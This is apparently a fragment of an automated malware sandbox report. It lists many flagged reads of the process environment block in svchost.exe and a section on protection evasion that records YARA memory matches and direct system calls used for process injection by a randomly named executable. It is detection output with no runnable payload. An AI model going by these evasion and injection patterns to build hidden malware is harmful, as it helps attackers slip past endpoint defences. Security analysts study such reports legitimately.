            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E12ED mov eax, dword ptr fs:[00000030h]2_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039052E2 mov eax, dword ptr fs:[00000030h]2_2_039052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EF2F8 mov eax, dword ptr fs:[00000030h]2_2_038EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038292FF mov eax, dword ptr fs:[00000030h]2_2_038292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03867208 mov eax, dword ptr fs:[00000030h]2_2_03867208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03867208 mov eax, dword ptr fs:[00000030h]2_2_03867208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905227 mov eax, dword ptr fs:[00000030h]2_2_03905227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829240 mov eax, dword ptr fs:[00000030h]2_2_03829240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829240 mov eax, dword ptr fs:[00000030h]2_2_03829240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386724D mov eax, dword ptr fs:[00000030h]2_2_0386724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EB256 mov eax, dword ptr fs:[00000030h]2_2_038EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EB256 mov eax, dword ptr fs:[00000030h]2_2_038EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FD26B mov eax, dword ptr fs:[00000030h]2_2_038FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FD26B mov eax, dword ptr fs:[00000030h]2_2_038FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03859274 mov eax, dword ptr fs:[00000030h]2_2_03859274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03871270 mov eax, dword ptr fs:[00000030h]2_2_03871270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03871270 mov eax, dword ptr fs:[00000030h]2_2_03871270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03887190 mov eax, dword ptr fs:[00000030h]2_2_03887190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E11A4 mov eax, dword ptr fs:[00000030h]2_2_038E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E11A4 mov eax, dword ptr fs:[00000030h]2_2_038E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E11A4 mov eax, dword ptr fs:[00000030h]2_2_038E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E11A4 mov eax, dword ptr fs:[00000030h]2_2_038E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384B1B0 mov eax, dword ptr fs:[00000030h]2_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386D1D0 mov eax, dword ptr fs:[00000030h]2_2_0386D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0386D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039051CB mov eax, dword ptr fs:[00000030h]2_2_039051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038551EF mov eax, dword ptr fs:[00000030h]2_2_038551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038351ED mov eax, dword ptr fs:[00000030h]2_2_038351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03831131 mov eax, dword ptr fs:[00000030h]2_2_03831131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03831131 mov eax, dword ptr fs:[00000030h]2_2_03831131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B136 mov eax, dword ptr fs:[00000030h]2_2_0382B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B136 mov eax, dword ptr fs:[00000030h]2_2_0382B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B136 mov eax, dword ptr fs:[00000030h]2_2_0382B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382B136 mov eax, dword ptr fs:[00000030h]2_2_0382B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905152 mov eax, dword ptr fs:[00000030h]2_2_03905152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829148 mov eax, dword ptr fs:[00000030h]2_2_03829148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829148 mov eax, dword ptr fs:[00000030h]2_2_03829148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829148 mov eax, dword ptr fs:[00000030h]2_2_03829148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03829148 mov eax, dword ptr fs:[00000030h]2_2_03829148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03837152 mov eax, dword ptr fs:[00000030h]2_2_03837152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F172 mov eax, dword ptr fs:[00000030h]2_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C9179 mov eax, dword ptr fs:[00000030h]2_2_038C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382D08D mov eax, dword ptr fs:[00000030h]2_2_0382D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03835096 mov eax, dword ptr fs:[00000030h]2_2_03835096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385D090 mov eax, dword ptr fs:[00000030h]2_2_0385D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385D090 mov eax, dword ptr fs:[00000030h]2_2_0385D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386909C mov eax, dword ptr fs:[00000030h]2_2_0386909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov ecx, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov ecx, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov ecx, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov ecx, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038470C0 mov eax, dword ptr fs:[00000030h]2_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039050D9 mov eax, dword ptr fs:[00000030h]2_2_039050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD0C0 mov eax, dword ptr fs:[00000030h]2_2_038AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AD0C0 mov eax, dword ptr fs:[00000030h]2_2_038AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038590DB mov eax, dword ptr fs:[00000030h]2_2_038590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038550E4 mov eax, dword ptr fs:[00000030h]2_2_038550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038550E4 mov ecx, dword ptr fs:[00000030h]2_2_038550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match File source: Process Memory Space: svchost.exe PID: 2644, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: BpYpWzndkWcpUJ.exe PID: 3880, type: MEMORYSTR
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtResumeThread: Direct from: 0x773836AC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtMapViewOfSection: Direct from: 0x77382D1C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtSetInformationThread: Direct from: 0x773763F9
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtCreateMutant: Direct from: 0x773835CC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtNotifyChangeKey: Direct from: 0x77383C2C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtSetInformationProcess: Direct from: 0x77382C5C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtCreateUserProcess: Direct from: 0x7738371C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtQueryInformationProcess: Direct from: 0x77382C26
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtResumeThread: Direct from: 0x77382FBC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtWriteVirtualMemory: Direct from: 0x7738490C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtReadFile: Direct from: 0x77382ADC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtDelayExecution: Direct from: 0x77382DDC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtQuerySystemInformation: Direct from: 0x77382DFC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtOpenSection: Direct from: 0x77382E0C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtQuerySystemInformation: Direct from: 0x773848CC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtReadVirtualMemory: Direct from: 0x77382E8C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtCreateKey: Direct from: 0x77382C6C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtQueryAttributesFile: Direct from: 0x77382E6C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtSetInformationThread: Direct from: 0x77382B4C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtTerminateThread: Direct from: 0x77382FCC
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe NtQueryInformationToken: Direct from: 0x77382CAC
